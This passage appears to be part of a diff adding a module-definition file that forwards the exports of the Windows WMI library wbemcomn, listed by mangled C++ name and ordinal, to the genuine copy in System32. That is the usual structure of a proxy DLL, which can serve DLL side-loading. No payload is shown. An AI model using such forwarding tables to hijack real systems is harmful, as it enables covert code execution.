+    ?AddDispatch@CSafeArray@@QEAAHPEAUIDispatch@@@Z=C:/Windows/System32/wbemcomn.?AddDispatch@CSafeArray@@QEAAHPEAUIDispatch@@@Z @464
+    ?AddDouble@CSafeArray@@QEAAHN@Z=C:/Windows/System32/wbemcomn.?AddDouble@CSafeArray@@QEAAHN@Z @465
+    ?AddElement@CPropertyName@@QEAAXPEBG@Z=C:/Windows/System32/wbemcomn.?AddElement@CPropertyName@@QEAAXPEBG@Z @466
+    ?AddEnvironmentValue@CWbemInstallObject@@SAJPEBG0@Z=C:/Windows/System32/wbemcomn.?AddEnvironmentValue@CWbemInstallObject@@SAJPEBG0@Z @467
+    ?AddFloat@CSafeArray@@QEAAHM@Z=C:/Windows/System32/wbemcomn.?AddFloat@CSafeArray@@QEAAHM@Z @468
+    ?AddHavingToken@QL_LEVEL_1_RPN_EXPRESSION@@UEAAXAEBU_tag_WbemQl1Token@@@Z=C:/Windows/System32/wbemcomn.?AddHavingToken@QL_LEVEL_1_RPN_EXPRESSION@@UEAAXAEBU_tag_WbemQl1Token@@@Z @469
+    ?AddInsertionString@CEventLogRecord@@IEAAXAEAVCInsertionString@@@Z=C:/Windows/System32/wbemcomn.?AddInsertionString@CEventLogRecord@@IEAAXAEAVCInsertionString@@@Z @470
+    ?AddLocale@CMUILocaleList@@AEAAJPEBGW4LocaleType@CMUILocale@@K@Z=C:/Windows/System32/wbemcomn.?AddLocale@CMUILocaleList@@AEAAJPEBGW4LocaleType@CMUILocale@@K@Z @471
+    ?AddLong@CSafeArray@@QEAAHJ@Z=C:/Windows/System32/wbemcomn.?AddLong@CSafeArray@@QEAAHJ@Z @472
+    ?AddMember@CLimitControl@@UEAAJXZ=C:/Windows/System32/wbemcomn.?AddMember@CLimitControl@@UEAAJXZ @473
+    ?AddProperty@QL_LEVEL_1_RPN_EXPRESSION@@UEAAXAEBVCPropertyName@@@Z=C:/Windows/System32/wbemcomn.?AddProperty@QL_LEVEL_1_RPN_EXPRESSION@@UEAAXAEBVCPropertyName@@@Z @474
+    ?AddRecord@CEventLog@@IEAAHPEAVCEventLogRecord@@@Z=C:/Windows/System32/wbemcomn.?AddRecord@CEventLog@@IEAAHPEAVCEventLogRecord@@@Z @475
+    ?AddRef@CBasicUnloadInstruction@@UEAAXXZ=C:/Windows/System32/wbemcomn.?AddRef@CBasicUnloadInstruction@@UEAAXXZ @476
+    ?AddRef@CBuffer@@UEAAKXZ=C:/Windows/System32/wbemcomn.?AddRef@CBuffer@@UEAAKXZ @477
+    ?AddRef@CContainerControl@@UEAAXPEAUIUnknown@@@Z=C:/Windows/System32/wbemcomn.?AddRef@CContainerControl@@UEAAXPEAUIUnknown@@@Z @478
+    ?AddRef@CExecQueue@@QEAAXXZ=C:/Windows/System32/wbemcomn.?AddRef@CExecQueue@@QEAAXXZ @479
+    ?AddRef@CUnk@@UEAAKXZ=C:/Windows/System32/wbemcomn.?AddRef@CUnk@@UEAAKXZ @480
+    ?AddRef@CUnkInternal@@UEAAKXZ=C:/Windows/System32/wbemcomn.?AddRef@CUnkInternal@@UEAAKXZ @481
+    ?AddRef@CWbemCallSecurity@@UEAAKXZ=C:/Windows/System32/wbemcomn.?AddRef@CWbemCallSecurity@@UEAAKXZ @482
+    ?AddRef@QL_LEVEL_1_RPN_EXPRESSION@@QEAAXXZ=C:/Windows/System32/wbemcomn.?AddRef@QL_LEVEL_1_RPN_EXPRESSION@@QEAAXXZ @483
+    ?AddScalar@CSafeArray@@AEAAHTSA_ArrayScalar@@@Z=C:/Windows/System32/wbemcomn.?AddScalar@CSafeArray@@AEAAHTSA_ArrayScalar@@@Z @484
+    ?AddShort@CSafeArray@@QEAAHF@Z=C:/Windows/System32/wbemcomn.?AddShort@CSafeArray@@QEAAHF@Z @485
+    ?AddToken@QL_LEVEL_1_RPN_EXPRESSION@@QEAAXAEBUQL_LEVEL_1_TOKEN@@@Z=C:/Windows/System32/wbemcomn.?AddToken@QL_LEVEL_1_RPN_EXPRESSION@@QEAAXAEBUQL_LEVEL_1_TOKEN@@@Z @486
+    ?AddToken@QL_LEVEL_1_RPN_EXPRESSION@@UEAAXAEBU_tag_WbemQl1Token@@@Z=C:/Windows/System32/wbemcomn.?AddToken@QL_LEVEL_1_RPN_EXPRESSION@@UEAAXAEBU_tag_WbemQl1Token@@@Z @487
+    ?AddUnknown@CSafeArray@@QEAAHPEAUIUnknown@@@Z=C:/Windows/System32/wbemcomn.?AddUnknown@CSafeArray@@QEAAHPEAUIUnknown@@@Z @488
+    ?AddVariant@CSafeArray@@QEAAHPEAUtagVARIANT@@@Z=C:/Windows/System32/wbemcomn.?AddVariant@CSafeArray@@QEAAHPEAUtagVARIANT@@@Z @489
+    ?AdjustInitialPriority@CExecQueue@@MEAAXPEAVCExecRequest@@@Z=C:/Windows/System32/wbemcomn.?AdjustInitialPriority@CExecQueue@@MEAAXPEAVCExecRequest@@@Z @490
+    ?AdjustPriorityForPassing@CExecQueue@@MEAAXPEAVCExecRequest@@@Z=C:/Windows/System32/wbemcomn.?AdjustPriorityForPassing@CExecQueue@@MEAAXPEAVCExecRequest@@@Z @491
+    ?Advance@CBuffer@@QEAAJK@Z=C:/Windows/System32/wbemcomn.?Advance@CBuffer@@QEAAJK@Z @493
+    ?AliasToTable@CWQLScanner@@QEAAQEAGPEAG@Z=C:/Windows/System32/wbemcomn.?AliasToTable@CWQLScanner@@QEAAQEAGPEAG@Z @494
+    ?Alloc@CWin32DefaultArena@@UEAAPEAX_K@Z=C:/Windows/System32/wbemcomn.?Alloc@CWin32DefaultArena@@UEAAPEAX_K@Z @495
+    ?AllocAmPm@CDateTimeParser@@IEAAPEAGXZ=C:/Windows/System32/wbemcomn.?AllocAmPm@CDateTimeParser@@IEAAPEAGXZ @496
+    ?AppendBuffer@WString2@@AEAAXPEBG_K@Z=C:/Windows/System32/wbemcomn.?AppendBuffer@WString2@@AEAAXPEBG_K@Z @497
+    ?AppendCulture@CMUILocaleList@@AEAAJPEBG@Z=C:/Windows/System32/wbemcomn.?AppendCulture@CMUILocaleList@@AEAAJPEBG@Z @498
+    ?AppendLocale@CMUILocaleList@@AEAAJPEBG@Z=C:/Windows/System32/wbemcomn.?AppendLocale@CMUILocaleList@@AEAAJPEBG@Z @499
+    ?Apply@CTextTemplate@@QEAAPEAGPEAUIWbemClassObject@@@Z=C:/Windows/System32/wbemcomn.?Apply@CTextTemplate@@QEAAPEAGPEAUIWbemClassObject@@@Z @500
+    ?Bind@CFlexArray@@QEAAXAEAV1@@Z=C:/Windows/System32/wbemcomn.?Bind@CFlexArray@@QEAAXAEAV1@@Z @501
+    ?BindPtr@WString2@@QEAAXPEAG@Z=C:/Windows/System32/wbemcomn.?BindPtr@WString2@@QEAAXPEAG@Z @502
+    ?BindPtr@WString@@QEAAXPEAG@Z=C:/Windows/System32/wbemcomn.?BindPtr@WString@@QEAAXPEAG@Z @503
+    ?BreakWait@CInstructionQueue@@QEAAXXZ=C:/Windows/System32/wbemcomn.?BreakWait@CInstructionQueue@@QEAAXXZ @508
+    ?BuildSWQLColRef@CWQLScanner@@AEAAHAEAVCFlexArray@@AEAUSWQLColRef@@@Z=C:/Windows/System32/wbemcomn.?BuildSWQLColRef@CWQLScanner@@AEAAHAEAVCFlexArray@@AEAUSWQLColRef@@@Z @510
+    ?CalcSitOutPenalty@CExecQueue@@MEAAKJ@Z=C:/Windows/System32/wbemcomn.?CalcSitOutPenalty@CExecQueue@@MEAAKJ@Z @512
+    ?CanDelete@CVar@@QEAAHXZ=C:/Windows/System32/wbemcomn.?CanDelete@CVar@@QEAAHXZ @513
+    ?CaptureStackTrace@CMemoryLog@@AEAAXQEAPEAX@Z=C:/Windows/System32/wbemcomn.?CaptureStackTrace@CMemoryLog@@AEAAXQEAPEAX@Z @514
+    ?Change@CInstructionQueue@@QEAAJPEAVCTimerInstruction@@VCWbemTime@@@Z=C:/Windows/System32/wbemcomn.?Change@CInstructionQueue@@QEAAJPEAVCTimerInstruction@@VCWbemTime@@@Z @515
+    ?ChangeTypeTo@CVar@@QEAAHG@Z=C:/Windows/System32/wbemcomn.?ChangeTypeTo@CVar@@QEAAHG@Z @516
+    ?ChangeTypeToEx@CVar@@QEAAHGK@Z=C:/Windows/System32/wbemcomn.?ChangeTypeToEx@CVar@@QEAAHGK@Z @517
+    ?CheckDMTFDateTimeFormat@CDateTimeParser@@SAHPEBGHH@Z=C:/Windows/System32/wbemcomn.?CheckDMTFDateTimeFormat@CDateTimeParser@@SAHPEBGHH@Z @519
+    ?CheckDMTFDateTimeFormatInternal@CDateTimeParser@@IEAAHPEBG@Z=C:/Windows/System32/wbemcomn.?CheckDMTFDateTimeFormatInternal@CDateTimeParser@@IEAAHPEBG@Z @520
+    ?CheckDMTFDateTimeInterval@CDateTimeParser@@SAHPEBG@Z=C:/Windows/System32/wbemcomn.?CheckDMTFDateTimeInterval@CDateTimeParser@@SAHPEBG@Z @521
+    ?CheckDateFormat@CDateTimeParser@@IEAAHPEBGH@Z=C:/Windows/System32/wbemcomn.?CheckDateFormat@CDateTimeParser@@IEAAHPEBGH@Z @522
+    ?CheckLangNeutral@CMUILocale@@SAJPEBGPEA_N@Z=C:/Windows/System32/wbemcomn.?CheckLangNeutral@CMUILocale@@SAJPEBGPEA_N@Z @523
+    ?CheckTimeFormat@CDateTimeParser@@IEAAHPEBGH@Z=C:/Windows/System32/wbemcomn.?CheckTimeFormat@CDateTimeParser@@IEAAHPEBGH@Z @524
+    ?CheckType@CSafeArray@@AEAAXH@Z=C:/Windows/System32/wbemcomn.?CheckType@CSafeArray@@AEAAXH@Z @525
+    ?CleanUp@CWbemInstallObject@@SAXXZ=C:/Windows/System32/wbemcomn.?CleanUp@CWbemInstallObject@@SAXXZ @526
+    ?ClearPropRefs@CWQLScanner@@AEAAXXZ=C:/Windows/System32/wbemcomn.?ClearPropRefs@CWQLScanner@@AEAAXXZ @527
+    ?ClearTableRefs@CWQLScanner@@AEAAXXZ=C:/Windows/System32/wbemcomn.?ClearTableRefs@CWQLScanner@@AEAAXXZ @528
+    ?ClearTokens@CWQLScanner@@AEAAXXZ=C:/Windows/System32/wbemcomn.?ClearTokens@CWQLScanner@@AEAAXXZ @529
+    ?Clone@CBuffer@@UEAAJPEAPEAUIStream@@@Z=C:/Windows/System32/wbemcomn.?Clone@CBuffer@@UEAAJPEAPEAUIStream@@@Z @530
+    ?CloneData@CSmallArrayBlob@@QEAAPEAPEAXXZ=C:/Windows/System32/wbemcomn.?CloneData@CSmallArrayBlob@@QEAAPEAPEAXXZ @531
+    ?CloneThreadContext@CWbemCallSecurity@@UEAAJH@Z=C:/Windows/System32/wbemcomn.?CloneThreadContext@CWbemCallSecurity@@UEAAJH@Z @532
+    ?CloneThreadToken@CWbemCallSecurity@@AEAAJK@Z=C:/Windows/System32/wbemcomn.?CloneThreadToken@CWbemCallSecurity@@AEAAJK@Z @533
+    ?Close@CEventLog@@QEAAHXZ=C:/Windows/System32/wbemcomn.?Close@CEventLog@@QEAAHXZ @534
+    ?CoCreateInstance@CWbemInstallObject@@SAJAEBU_GUID@@PEAUIUnknown@@K0PEAPEAX@Z=C:/Windows/System32/wbemcomn.?CoCreateInstance@CWbemInstallObject@@SAJAEBU_GUID@@PEAUIUnknown@@K0PEAPEAX@Z @535
+    ?CoGetClassObject@CWbemInstallObject@@SAJAEBU_GUID@@KPEAU_COSERVERINFO@@0PEAPEAX@Z=C:/Windows/System32/wbemcomn.?CoGetClassObject@CWbemInstallObject@@SAJAEBU_GUID@@KPEAU_COSERVERINFO@@0PEAPEAX@Z @536
+    ?Commit@CBuffer@@UEAAJK@Z=C:/Windows/System32/wbemcomn.?Commit@CBuffer@@UEAAJK@Z @537
+    ?CompareEls@CFlexArray@@KAHPEBX0@Z=C:/Windows/System32/wbemcomn.?CompareEls@CFlexArray@@KAHPEBX0@Z @538
+    ?CompareEls@CSmallArrayBlob@@KAHPEBX0@Z=C:/Windows/System32/wbemcomn.?CompareEls@CSmallArrayBlob@@KAHPEBX0@Z @539
+    ?CompareTo@CVar@@QEAAHAEAV1@H@Z=C:/Windows/System32/wbemcomn.?CompareTo@CVar@@QEAAHAEAV1@H@Z @540
+    ?CompareTo@CVarVector@@QEAAHAEAV1@H@Z=C:/Windows/System32/wbemcomn.?CompareTo@CVarVector@@QEAAHAEAV1@H@Z @541
+    ?Compress@CFlexArray@@QEAAXXZ=C:/Windows/System32/wbemcomn.?Compress@CFlexArray@@QEAAXXZ @543
+    ?Compress@CWStringArray@@QEAAXXZ=C:/Windows/System32/wbemcomn.?Compress@CWStringArray@@QEAAXXZ @544
+    ?CompressBuffer@CMRCICompression@@QEAAIPEAEK0KW4CompressionLevel@1@@Z=C:/Windows/System32/wbemcomn.?CompressBuffer@CMRCICompression@@QEAAIPEAEK0KW4CompressionLevel@1@@Z @545
+    ?CompressFile@CMRCICompression@@QEAAHPEBG0KW4CompressionLevel@1@PEAVCMRCIControl@@@Z=C:/Windows/System32/wbemcomn.?CompressFile@CMRCICompression@@QEAAHPEBG0KW4CompressionLevel@1@PEAVCMRCIControl@@@Z @546
+    ?CompressFileV1@CMRCICompression@@IEAAHHHKW4CompressionLevel@1@PEAVCMRCIControl@@@Z=C:/Windows/System32/wbemcomn.?CompressFileV1@CMRCICompression@@IEAAHHHKW4CompressionLevel@1@PEAVCMRCIControl@@@Z @547
+    ?ComputePenalty@CMinMaxLimitControl@@IEAAJKKPEAKPEAH@Z=C:/Windows/System32/wbemcomn.?ComputePenalty@CMinMaxLimitControl@@IEAAJKKPEAKPEAH@Z @548
+    ?ConcatWithoutQuotes@CTextTemplate@@AEAAXAEAVWString2@@AEAPEAG@Z=C:/Windows/System32/wbemcomn.?ConcatWithoutQuotes@CTextTemplate@@AEAAXAEAVWString2@@AEAPEAG@Z @549
+    ?ContainsSid@CNtAcl@@QEAAHAEAVCNtSid@@AEAE@Z=C:/Windows/System32/wbemcomn.?ContainsSid@CNtAcl@@QEAAHAEAVCNtSid@@AEAE@Z @550
+    ?CopyBuffer@WString2@@AEAAXPEBG_K@Z=C:/Windows/System32/wbemcomn.?CopyBuffer@WString2@@AEAAXPEBG_K@Z @551
+    ?CopyData@CSmallArrayBlob@@IEAAXPEAV1@@Z=C:/Windows/System32/wbemcomn.?CopyData@CSmallArrayBlob@@IEAAXPEAV1@@Z @552
+    ?CopyDataFrom@CFlexArray@@QEAAHAEBV1@@Z=C:/Windows/System32/wbemcomn.?CopyDataFrom@CFlexArray@@QEAAHAEBV1@@Z @553
+    ?CopyTo@CBuffer@@UEAAJPEAUIStream@@T_ULARGE_INTEGER@@PEAT3@2@Z=C:/Windows/System32/wbemcomn.?CopyTo@CBuffer@@UEAAJPEAUIStream@@T_ULARGE_INTEGER@@PEAT3@2@Z @555
+    ?CopyTo@CNtSid@@QEAAHPEAX@Z=C:/Windows/System32/wbemcomn.?CopyTo@CNtSid@@QEAAHPEAX@Z @556
+    ?CountQuery@CWQLScanner@@QEAAHXZ=C:/Windows/System32/wbemcomn.?CountQuery@CWQLScanner@@QEAAHXZ @557
+    ?CreateBlob@CSmallArrayBlob@@SAPEAV1@H@Z=C:/Windows/System32/wbemcomn.?CreateBlob@CSmallArrayBlob@@SAPEAV1@H@Z @558
+    ?CreateInst@CWbemCallSecurity@@SAPEAVIWbemCallSecurity@@XZ=C:/Windows/System32/wbemcomn.?CreateInst@CWbemCallSecurity@@SAPEAVIWbemCallSecurity@@XZ @559
+    ?CreateNewThread@CExecQueue@@MEAAHXZ=C:/Windows/System32/wbemcomn.?CreateNewThread@CExecQueue@@MEAAHXZ @560
+    ?CurrentLine@CAbstractQl1Parser@@QEAAHXZ=C:/Windows/System32/wbemcomn.?CurrentLine@CAbstractQl1Parser@@QEAAHXZ @562
+    ?CurrentToken@CAbstractQl1Parser@@QEAAPEAGXZ=C:/Windows/System32/wbemcomn.?CurrentToken@CAbstractQl1Parser@@QEAAPEAGXZ @563
+    ?DateFormat10@CDateTimeParser@@IEAAHPEBG0H@Z=C:/Windows/System32/wbemcomn.?DateFormat10@CDateTimeParser@@IEAAHPEBG0H@Z @564
+    ?DateFormat11@CDateTimeParser@@IEAAHPEBG0H@Z=C:/Windows/System32/wbemcomn.?DateFormat11@CDateTimeParser@@IEAAHPEBG0H@Z @565
+    ?DateFormat12@CDateTimeParser@@IEAAHPEBG0H@Z=C:/Windows/System32/wbemcomn.?DateFormat12@CDateTimeParser@@IEAAHPEBG0H@Z @566
+    ?DateFormat13@CDateTimeParser@@IEAAHPEBG0H@Z=C:/Windows/System32/wbemcomn.?DateFormat13@CDateTimeParser@@IEAAHPEBG0H@Z @567
+    ?DateFormat14@CDateTimeParser@@IEAAHPEBG0H@Z=C:/Windows/System32/wbemcomn.?DateFormat14@CDateTimeParser@@IEAAHPEBG0H@Z @568
+    ?DateFormat15@CDateTimeParser@@IEAAHPEBGH@Z=C:/Windows/System32/wbemcomn.?DateFormat15@CDateTimeParser@@IEAAHPEBGH@Z @569
+    ?DateFormat1@CDateTimeParser@@IEAAHPEBGH@Z=C:/Windows/System32/wbemcomn.?DateFormat1@CDateTimeParser@@IEAAHPEBGH@Z @570
+    ?DateFormat2@CDateTimeParser@@IEAAHPEBGH@Z=C:/Windows/System32/wbemcomn.?DateFormat2@CDateTimeParser@@IEAAHPEBGH@Z @571
+    ?DateFormat3@CDateTimeParser@@IEAAHPEBGH@Z=C:/Windows/System32/wbemcomn.?DateFormat3@CDateTimeParser@@IEAAHPEBGH@Z @572
+    ?DateFormat4@CDateTimeParser@@IEAAHPEBGH@Z=C:/Windows/System32/wbemcomn.?DateFormat4@CDateTimeParser@@IEAAHPEBGH@Z @573
+    ?DateFormat5@CDateTimeParser@@IEAAHPEBGH@Z=C:/Windows/System32/wbemcomn.?DateFormat5@CDateTimeParser@@IEAAHPEBGH@Z @574
+    ?DateFormat6@CDateTimeParser@@IEAAHPEBGH@Z=C:/Windows/System32/wbemcomn.?DateFormat6@CDateTimeParser@@IEAAHPEBGH@Z @575
+    ?DateFormat7@CDateTimeParser@@IEAAHPEBGH@Z=C:/Windows/System32/wbemcomn.?DateFormat7@CDateTimeParser@@IEAAHPEBGH@Z @576
+    ?DateFormat8@CDateTimeParser@@IEAAHPEBGH@Z=C:/Windows/System32/wbemcomn.?DateFormat8@CDateTimeParser@@IEAAHPEBGH@Z @577
+    ?DateFormat9@CDateTimeParser@@IEAAHPEBG0H@Z=C:/Windows/System32/wbemcomn.?DateFormat9@CDateTimeParser@@IEAAHPEBG0H@Z @578
+    ?DebugDump@CFlexArray@@QEAAXXZ=C:/Windows/System32/wbemcomn.?DebugDump@CFlexArray@@QEAAXXZ @579
+    ?DecrementIndex@CFlexQueue@@IEAAXAEAH@Z=C:/Windows/System32/wbemcomn.?DecrementIndex@CFlexQueue@@IEAAXAEAH@Z @581
+    ?DeleteAce@CNtAcl@@QEAAHH@Z=C:/Windows/System32/wbemcomn.?DeleteAce@CNtAcl@@QEAAHH@Z @582
+    ?DeletePropertyName@CAbstractQl1Parser@@IEAAXXZ=C:/Windows/System32/wbemcomn.?DeletePropertyName@CAbstractQl1Parser@@IEAAXXZ @583
+    ?DeleteSacl@CNtSecurityDescriptor@@QEAAJXZ=C:/Windows/System32/wbemcomn.?DeleteSacl@CNtSecurityDescriptor@@QEAAJXZ @584
+    ?DeleteStr@CWStringArray@@QEAAHH@Z=C:/Windows/System32/wbemcomn.?DeleteStr@CWStringArray@@QEAAHH@Z @585
+    ?DeleteString@WString2@@AEAAX_N@Z=C:/Windows/System32/wbemcomn.?DeleteString@WString2@@AEAAX_N@Z @586
+    ?DeleteString@WString@@AEAAXPEAG@Z=C:/Windows/System32/wbemcomn.?DeleteString@WString@@AEAAXPEAG@Z @587
+    ?DeleteValue@Registry@@QEAAHPEBG@Z=C:/Windows/System32/wbemcomn.?DeleteValue@Registry@@QEAAHPEBG@Z @588
+    ?Dequeue@CFlexQueue@@QEAAPEAXXZ=C:/Windows/System32/wbemcomn.?Dequeue@CFlexQueue@@QEAAPEAXXZ @589
+    ?Dequeue@CInstructionQueue@@QEAAJAEAPEAVCTimerInstruction@@AEAVCWbemTime@@@Z=C:/Windows/System32/wbemcomn.?Dequeue@CInstructionQueue@@QEAAJAEAPEAVCTimerInstruction@@AEAVCWbemTime@@@Z @590
+    ?Deserialize@C9XAce@@UEAA_NPEAE@Z=C:/Windows/System32/wbemcomn.?Deserialize@C9XAce@@UEAA_NPEAE@Z @591
+    ?Deserialize@CNtAce@@UEAA_NPEAE@Z=C:/Windows/System32/wbemcomn.?Deserialize@CNtAce@@UEAA_NPEAE@Z @592
+    ?Difference@CWStringArray@@SAXAEAV1@00@Z=C:/Windows/System32/wbemcomn.?Difference@CWStringArray@@SAXAEAV1@00@Z @593
+    ?Disable@CTraceSessionControl@@QEAAKXZ=C:/Windows/System32/wbemcomn.?Disable@CTraceSessionControl@@QEAAKXZ @594
+    ?DoLike@CLike@@IEAA_NPEBG0G@Z=C:/Windows/System32/wbemcomn.?DoLike@CLike@@IEAA_NPEBG0G@Z @595
+    ?DoesNeedNewThread@CExecQueue@@MEAAHPEAVCExecRequest@@@Z=C:/Windows/System32/wbemcomn.?DoesNeedNewThread@CExecQueue@@MEAAHPEAVCExecRequest@@@Z @596
+    ?DoesVectorTypeMatchArrayType@CVarVector@@QEAAHXZ=C:/Windows/System32/wbemcomn.?DoesVectorTypeMatchArrayType@CVarVector@@QEAAHXZ @597
+    ?Dump@CWQLScanner@@QEAAXXZ=C:/Windows/System32/wbemcomn.?Dump@CWQLScanner@@QEAAXXZ @598
+    ?Dump@QL_LEVEL_1_RPN_EXPRESSION@@QEAAXPEBD@Z=C:/Windows/System32/wbemcomn.?Dump@QL_LEVEL_1_RPN_EXPRESSION@@QEAAXPEBD@Z @599
+    ?Dump@QL_LEVEL_1_TOKEN@@QEAAXPEAU_iobuf@@@Z=C:/Windows/System32/wbemcomn.?Dump@QL_LEVEL_1_TOKEN@@QEAAXPEAU_iobuf@@@Z @600
+    ?DumpError@CExecRequest@@UEAAXXZ=C:/Windows/System32/wbemcomn.?DumpError@CExecRequest@@UEAAXXZ @602
+    ?DumpText@CVar@@QEAAHPEAU_iobuf@@@Z=C:/Windows/System32/wbemcomn.?DumpText@CVar@@QEAAHPEAU_iobuf@@@Z @603
+    ?ElementSize@CSafeArray@@QEAAHXZ=C:/Windows/System32/wbemcomn.?ElementSize@CSafeArray@@QEAAHXZ @604
+    ?Empty@CFlexArray@@QEAAXXZ=C:/Windows/System32/wbemcomn.?Empty@CFlexArray@@QEAAXXZ @605
+    ?Empty@CPropertyName@@QEAAXXZ=C:/Windows/System32/wbemcomn.?Empty@CPropertyName@@QEAAXXZ @606
+    ?Empty@CSafeArray@@QEAAXXZ=C:/Windows/System32/wbemcomn.?Empty@CSafeArray@@QEAAXXZ @607
+    ?Empty@CVar@@QEAAXXZ=C:/Windows/System32/wbemcomn.?Empty@CVar@@QEAAXXZ @608
+    ?Empty@CVarVector@@QEAAXXZ=C:/Windows/System32/wbemcomn.?Empty@CVarVector@@QEAAXXZ @609
+    ?Empty@CWStringArray@@QEAAXXZ=C:/Windows/System32/wbemcomn.?Empty@CWStringArray@@QEAAXXZ @610
+    ?Empty@WString2@@QEAAXXZ=C:/Windows/System32/wbemcomn.?Empty@WString2@@QEAAXXZ @611
+    ?Empty@WString@@QEAAXXZ=C:/Windows/System32/wbemcomn.?Empty@WString@@QEAAXXZ @612
+    ?Enable@CTraceSessionControl@@QEAAKXZ=C:/Windows/System32/wbemcomn.?Enable@CTraceSessionControl@@QEAAKXZ @613
+    ?EncryptedCall@CIdentitySecurity@@AEAA_NXZ=C:/Windows/System32/wbemcomn.?EncryptedCall@CIdentitySecurity@@AEAA_NXZ @616
+    ?Enqueue@CExecQueue@@UEAAJPEAVCExecRequest@@PEAPEAX@Z=C:/Windows/System32/wbemcomn.?Enqueue@CExecQueue@@UEAAJPEAVCExecRequest@@PEAPEAX@Z @617
+    ?Enqueue@CFlexQueue@@QEAA_NPEAX@Z=C:/Windows/System32/wbemcomn.?Enqueue@CFlexQueue@@QEAA_NPEAX@Z @618
+    ?Enqueue@CInstructionQueue@@QEAAJVCWbemTime@@PEAVCTimerInstruction@@@Z=C:/Windows/System32/wbemcomn.?Enqueue@CInstructionQueue@@QEAAJVCWbemTime@@PEAVCTimerInstruction@@@Z @619
+    ?EnqueueAndWait@CExecQueue@@QEAAJPEAVCExecRequest@@@Z=C:/Windows/System32/wbemcomn.?EnqueueAndWait@CExecQueue@@QEAAJPEAVCExecRequest@@@Z @620
+    ?EnqueueWithoutSleep@CExecQueue@@QEAAJPEAVCExecRequest@@PEAPEAX@Z=C:/Windows/System32/wbemcomn.?EnqueueWithoutSleep@CExecQueue@@QEAAJPEAVCExecRequest@@PEAPEAX@Z @621
+    ?EnsureAllocated@CPropertyName@@IEAAXJ@Z=C:/Windows/System32/wbemcomn.?EnsureAllocated@CPropertyName@@IEAAXJ@Z @622
+    ?EnsureExtent@CFlexArray@@QEAAHH@Z=C:/Windows/System32/wbemcomn.?EnsureExtent@CFlexArray@@QEAAHH@Z @623
+    ?EnsureExtent@CSmallArrayBlob@@IEAAPEAV1@H@Z=C:/Windows/System32/wbemcomn.?EnsureExtent@CSmallArrayBlob@@IEAAPEAV1@H@Z @624
+    ?EnsureMatchState@CLike@@AEAAX_K@Z=C:/Windows/System32/wbemcomn.?EnsureMatchState@CLike@@AEAAX_K@Z @625
+    ?EnsureRunning@CTimerGenerator@@AEAAXXZ=C:/Windows/System32/wbemcomn.?EnsureRunning@CTimerGenerator@@AEAAXXZ @626
+    ?EnsureSize@CBuffer@@AEAAXK@Z=C:/Windows/System32/wbemcomn.?EnsureSize@CBuffer@@AEAAXK@Z @627
+    ?Enter@CCheckedInCritSec@@QEAAXXZ=C:/Windows/System32/wbemcomn.?Enter@CCheckedInCritSec@@QEAAXXZ @628
+    ?Enter@CCritSec@@QEAAXXZ=C:/Windows/System32/wbemcomn.?Enter@CCritSec@@QEAAXXZ @629
+    ?Enter@CExecQueue@@QEAAXXZ=C:/Windows/System32/wbemcomn.?Enter@CExecQueue@@QEAAXXZ @630
+    ?Enter@CStaticCritSec@@QEAAXXZ=C:/Windows/System32/wbemcomn.?Enter@CStaticCritSec@@QEAAXXZ @631
+    ?Enter@CWbemCriticalSection@@QEAAHK@Z=C:/Windows/System32/wbemcomn.?Enter@CWbemCriticalSection@@QEAAHK@Z @632
+    ?Equal@WString2@@QEBAHPEBG@Z=C:/Windows/System32/wbemcomn.?Equal@WString2@@QEBAHPEBG@Z @633
+    ?Equal@WString@@QEBAHPEBG@Z=C:/Windows/System32/wbemcomn.?Equal@WString@@QEBAHPEBG@Z @634
+    ?EqualNoCase@WString2@@QEBAHPEBG@Z=C:/Windows/System32/wbemcomn.?EqualNoCase@WString2@@QEBAHPEBG@Z @635
+    ?EqualNoCase@WString@@QEBAHPEBG@Z=C:/Windows/System32/wbemcomn.?EqualNoCase@WString@@QEBAHPEBG@Z @636
+    ?EscapeQuotes@WString2@@QEBA?AV1@XZ=C:/Windows/System32/wbemcomn.?EscapeQuotes@WString2@@QEBA?AV1@XZ @638
+    ?EscapeQuotes@WString@@QEBA?AV1@XZ=C:/Windows/System32/wbemcomn.?EscapeQuotes@WString@@QEBA?AV1@XZ @639
+    ?Execute@CExecQueue@@MEAAHPEAVCThreadRecord@1@@Z=C:/Windows/System32/wbemcomn.?Execute@CExecQueue@@MEAAHPEAVCThreadRecord@1@@Z @640
+    ?ExpandEnvironmentStringsW@CWbemInstallObject@@SAKPEBGPEAGK@Z=C:/Windows/System32/wbemcomn.?ExpandEnvironmentStringsW@CWbemInstallObject@@SAKPEBGPEAGK@Z @641
+    ?ExpandVariableValue@CWbemInstallObject@@CAJPEBGPEAG_KPEA_K@Z=C:/Windows/System32/wbemcomn.?ExpandVariableValue@CWbemInstallObject@@CAJPEBGPEAG_KPEA_K@Z @642
+    ?ExtractNext@CWQLScanner@@AEAAPEAUWSLexToken@@H@Z=C:/Windows/System32/wbemcomn.?ExtractNext@CWQLScanner@@AEAAPEAUWSLexToken@@H@Z @644
+    ?ExtractSelectType@CWQLScanner@@AEAAHXZ=C:/Windows/System32/wbemcomn.?ExtractSelectType@CWQLScanner@@AEAAHXZ @645
+    ?ExtractToken@WString2@@QEAAHGAEAV1@@Z=C:/Windows/System32/wbemcomn.?ExtractToken@WString2@@QEAAHGAEAV1@@Z @646
+    ?ExtractToken@WString2@@QEAAHPEBGAEAV1@@Z=C:/Windows/System32/wbemcomn.?ExtractToken@WString2@@QEAAHPEBGAEAV1@@Z @647
+    ?ExtractToken@WString@@QEAAHGAEAV1@@Z=C:/Windows/System32/wbemcomn.?ExtractToken@WString@@QEAAHGAEAV1@@Z @648
+    ?ExtractToken@WString@@QEAAHPEBGAEAV1@@Z=C:/Windows/System32/wbemcomn.?ExtractToken@WString@@QEAAHPEBGAEAV1@@Z @649
+    ?Fatal@CSafeArray@@AEAAXPEBD@Z=C:/Windows/System32/wbemcomn.?Fatal@CSafeArray@@AEAAXPEBD@Z @650
+    ?FillCVarAt@CVarVector@@QEAAXHAEAVCVar@@@Z=C:/Windows/System32/wbemcomn.?FillCVarAt@CVarVector@@QEAAXHAEAVCVar@@@Z @651
+    ?FillDMTF@CDateTimeParser@@QEAAHPEAG_K@Z=C:/Windows/System32/wbemcomn.?FillDMTF@CDateTimeParser@@QEAAHPEAG_K@Z @652
+    ?FillVariant@CVar@@QEAAXPEAUtagVARIANT@@H@Z=C:/Windows/System32/wbemcomn.?FillVariant@CVar@@QEAAXPEAUtagVARIANT@@H@Z @653
